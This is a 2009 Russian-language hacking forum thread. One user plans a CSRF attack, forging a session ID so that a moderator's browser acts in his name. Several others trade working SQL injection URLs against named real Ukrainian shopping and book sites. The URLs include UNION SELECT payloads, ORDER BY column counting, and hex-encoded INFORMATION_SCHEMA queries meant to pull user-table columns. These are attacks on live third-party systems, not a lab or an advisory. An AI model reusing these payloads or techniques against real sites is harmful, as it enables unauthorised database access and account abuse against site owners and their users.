22.01.2009, 04:00
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
Я в пыхе не очень,но понял на счет переменной сид вот что:
если $сид пуста или $сид не равна $юсердата со значением $сесион_ид(если праильно понял $сесион_ид в таких скобках [] была)то показать ошибку на счет сесии как я писал где переменая $юсердата равна $ип и $логин,а $сесион_ид равна $ип,$автологин,$админ,$юсер_и д и еще 2словам без знака переменых это наверное значение из таблицы мускула!Кто подскажет обломавыется ли моя CSRF?Может я смогу подделать эту переменую сид.
|
|
|
22.01.2009, 04:30
|
|
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме:
515774
Репутация:
71
|
|
Qam хз че ты написал чесно в пол третьего ночи тяжело думается, а поделу
SID ето тот идентификатор с которым ты лазишь по форумк послу того как успешно залогинился, он может связываться с твоим логином на сайте а может и с логином и пароль сразу , хранится в базе на серве до окончания сессии пока не пройдет определенное количество времени или ты не закроешь браузер,
если ты думаешь что тупо изменить СИД на другой СИд другого юзверя то такой вариант прокатит только если в кукисах не хранится твой зашифрованный пароль, и если СИД еще жив (тоесть жертва не закрыла браузер)
|
|
|
|
22.01.2009, 04:46
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
|
|
|
|
22.01.2009, 12:40
|
|
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729
Репутация:
67
|
|
Сообщение от Qam
RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
возможно да, кинь кусок исходника, где генерируется sid, а то так сложно угадать
|
|
|
|
22.01.2009, 05:24
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
а как с такой таблы достать поля?
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+user+from+tk_users--
|
|
|
|
22.01.2009, 08:20
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
1.как узнать количество полей?
http://elitka.com.ua/view.php?id=381%27
2. и вот такая трабла
Код:
http://vitlen.com.ua/index.php?categoryID=128%20order%20by%201%20--
отбражает исходную
Код:
http://vitlen.com.ua/index.php?categoryID=128%20UNION%20SELECT%201%20--
вывод The used SELECT statements have a different number of columns
Последний раз редактировалось TELO; 22.01.2009 в 08:34..
|
|
|
|
22.01.2009, 08:31
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
а как с такой таблы достать поля?
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит
за хекси Users а знак (=) замени на like
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1
Последний раз редактировалось Doom123; 22.01.2009 в 08:34..
|
|
|
|
22.01.2009, 08:39
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от Doom123
за хекси Users а знак (=) замени на like
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1
непрокатило
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20LIKE=0x5573657273%20LIMIT%200,1%20--
|
|
|
|
22.01.2009, 08:34
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
TELO
http://elitka.com.ua/cat.php?c=1+union+select+1,2,3,4,5,6--
5 ветка..
http://vitlen.com.ua/index.php?categoryID=-128+union+select+1--
так нету ошибки.. а при 1,2 есть...
Последний раз редактировалось sabe; 22.01.2009 в 08:37..
|
|
|
|
22.01.2009, 08:48
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
Сообщение от sabe
TELO
5 ветка..
так нету ошибки.. а при 1,2 есть...
не там и не там нет вывода
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
